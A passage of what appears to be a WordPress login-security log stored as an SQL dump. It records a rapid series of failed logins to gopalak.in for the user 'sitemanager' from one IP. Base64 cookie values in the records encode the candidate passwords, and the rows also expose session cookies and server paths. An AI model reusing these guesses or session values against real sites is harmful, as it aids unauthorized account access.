wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7U2l0ZW1hbmFnZXI5OTg4\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746811918.42296;s:12:\"REQUEST_TIME\";i:1746811918;}}','109.176.202.52',1,'2025-05-09 23:02:00','2025-05-09 23:12:07'),(95096,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"88\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:300:\"_uid=rB8jg2geOadsUVttAw0yAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7U2l0ZW1hbmFnZXI5OTk%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746811920.2608991;s:12:\"REQUEST_TIME\";i:1746811920;}}','109.176.202.52',1,'2025-05-09 23:02:01','2025-05-09 23:12:07'),(95097,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"90\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:298:\"_uid=rB8jg2geOadsUVttAw0yAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7U2l0ZW1hbmFnZXI5OTk5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746811922.287473;s:12:\"REQUEST_TIME\";i:1746811922;}}','109.176.202.52',1,'2025-05-09 23:02:03','2025-05-09 23:12:07'),(95098,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"88\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:306:\"_uid=rB8jg2geOadsUVttAw0yAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7U2l0ZW1hbmFnZXJAIyQlXg%3D%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746811924.1027629;s:12:\"REQUEST_TIME\";i:1746811924;}}','109.176.202.52',1,'2025-05-09 23:02:05','2025-05-09 23:12:07'),(95099,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"87\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:298:\"_uid=rB8jg2geOadsUVttAw0yAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7U2l0ZW1hbmFnZXJAMTIz\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746811925.9273181;s:12:\"REQUEST_TIME\";i:1746811925;}}','109.176.202.52',1,'2025-05-09 23:02:07','2025-05-09 23:12:07'),(95100,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"86\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:302:\"_uid=rB8jg2geOadsUVttAw0yAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7YWRtaW5pc3RyYWRvcg%3D%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746812526.1557109;s:12:\"REQUEST_TIME\";i:1746812526;}}','109.176.202.52',1,'2025-05-09 23:12:07','2025-05-10 23:12:14'),(95101,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"82\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:302:\"_uid=rB8jg2geOadsUVttAw0yAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7YWRtaW5pc3RyYXRvcg%3D%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"82\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746812527.939688;s:12:\"REQUEST_TIME\";i:1746812527;}}','109.176.202.52',1,'2025-05-09 23:12:09','2025-05-10 23:12:14'),(95102,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"86\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:290:\"_uid=rB8jg2geOadsUVttAw0yAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7YWRtaW5wYXNz\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746812529.743212;s:12:\"REQUEST_TIME\";i:1746812529;}}','109.176.202.52',1,'2025-05-09 23:12:11','2025-05-10 23:12:14'),(95103,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"81\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:302:\"_uid=rB8jg2geOadsUVttAw0yAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7YWRtaW51c2VyOTk5IQ%3D%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"81\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746812531.5231991;s:12:\"REQUEST_TIME\";i:1746812531;}}','109.176.202.52',1,'2025-05-09 23:12:13','2025-05-10 23:12:14'),(95104,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"86\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:292:\"_uid=rB8jg2geOadsUVttAw0yAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; 